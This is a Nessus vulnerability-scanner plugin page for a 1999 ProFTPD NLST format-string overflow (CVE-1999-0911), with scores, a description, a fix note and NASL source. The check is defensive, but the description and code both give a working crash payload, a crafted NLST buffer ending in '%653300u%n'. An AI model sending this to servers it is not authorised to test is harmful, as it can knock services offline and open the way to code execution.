Lucene search

K
nessusThis script is Copyright (C) 1999-2018 Tenable Network Security, Inc.PROFTPD_PRE6_EXPLOIT.NASL
HistorySep 21, 1999 - 12:00 a.m.

ProFTPD NLST Command Argument Handling Remote Overflow

1999-09-2100:00:00
This script is Copyright (C) 1999-2018 Tenable Network Security, Inc.
www.tenable.com
16

10 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

0.025 Low

EPSS

Percentile

90.1%

It was possible to crash the remote FTP server by issuing a specially crafted command, such as ‘NLST aaaXXXX%u%[…]%u%u%u%%u%653300u%n’ where ‘XXXX’ is replaced with four characters - ASCII values 0xDC, 0x4F, 0x07 and 0x08. This issue is known to affect ProFTPD version 1.2.0pre6, although other FTP servers may be affected as well.

It is likely that a remote attacker can leverage this issue to execute arbitrary code on the remote host, subject to the privileges under which the service runs.

#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
 script_id(10191);
 script_version("1.50");
 script_cvs_date("Date: 2018/11/15 20:50:22");

 script_cve_id("CVE-1999-0911");
 script_bugtraq_id(612);

 script_name(english:"ProFTPD NLST Command Argument Handling Remote Overflow");
 script_summary(english:"Checks if the remote ftp can be buffer overflowed");

 script_set_attribute(attribute:"synopsis", value:"The remote FTP server is affected by a buffer overflow vulnerability.");
 script_set_attribute(attribute:"description", value:
"It was possible to crash the remote FTP server by issuing a specially
crafted command, such as 'NLST aaaXXXX%u%[...]%u%u%u%%u%653300u%n'
where 'XXXX' is replaced with four characters - ASCII values 0xDC,
0x4F, 0x07 and 0x08. This issue is known to affect ProFTPD version
1.2.0pre6, although other FTP servers may be affected as well.

It is likely that a remote attacker can leverage this issue to execute
arbitrary code on the remote host, subject to the privileges under
which the service runs.");
 script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/1999/Sep/293");
 script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/1999/Sep/314");
 script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/1999/Sep/328");
 script_set_attribute(attribute:"solution", value:
"If running ProFTPD, upgrade to version 1.2.0pre7 or later; otherwise,
contact the vendor to see if an update exists.");
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
 script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"true");

 script_set_attribute(attribute:"plugin_publication_date", value:"1999/09/21");

 script_set_attribute(attribute:"potential_vulnerability", value:"true");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_set_attribute(attribute:"cpe", value:"cpe:/a:proftpd:proftpd");
 script_end_attributes();

 script_category(ACT_MIXED_ATTACK); # mixed
 script_family(english:"FTP");

 script_copyright(english:"This script is Copyright (C) 1999-2018 Tenable Network Security, Inc.");

 script_dependencie("ftpserver_detect_type_nd_version.nasl", "wu_ftpd_overflow.nasl");
 script_exclude_keys("ftp/ncftpd", "ftp/msftpd");
 script_require_keys("ftp/login", "Settings/ParanoidReport");
 script_require_ports("Services/ftp", 21);

 exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("ftp_func.inc");

if (report_paranoia < 2) audit(AUDIT_PARANOID);

port = get_ftp_port(default: 21);

# First, we need anonymous access
login = get_kb_item("ftp/login");
password = get_kb_item("ftp/password");

banner = get_ftp_banner(port:port);


if(!(login) || (safe_checks()))
{
 if(banner)
 {
   if(egrep(pattern:"^220 ProFTPD 1\.2\.0pre[1-6][^0-9]", string:banner))
   {
     report = string(
       "\n",
       "Note that Nessus has determined the vulnerability exists based solely\n",
       "on the following service banner :\n",
       "\n",
       "  ", banner
     );
     security_hole(port:port, extra:report);
   }
 }
 exit(0);
}


soc = open_sock_tcp(port);
if (! soc) exit(1);

if (! ftp_authenticate(socket:soc, user:login, pass:password))
  exit(1, "Could not authenticate on the FTP server on port "+port+".");

  #
  # Solaris's FTPd won't answer to an NLST until a port has been
  # opened to receive the data.
  #
send(socket:soc, data:'NLST /\r\n');
r = ftp_recv_line(socket:soc);
if (!r) exit(1);

  buf = raw_string("aaa", 0xdc, 0x4f, 0x07, 0x08);
  buf = buf + crap(data:"%u", length:72)  + "%653300u%n";
  c = "NLST "+buf+'\r\n';
  send(socket:soc, data:c);
  b = ftp_recv_line(socket:soc);
  if(!b)security_hole(port);
  close(soc);
VendorProductVersionCPE
proftpdproftpdcpe:/a:proftpd:proftpd

10 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

0.025 Low

EPSS

Percentile

90.1%

Related for PROFTPD_PRE6_EXPLOIT.NASL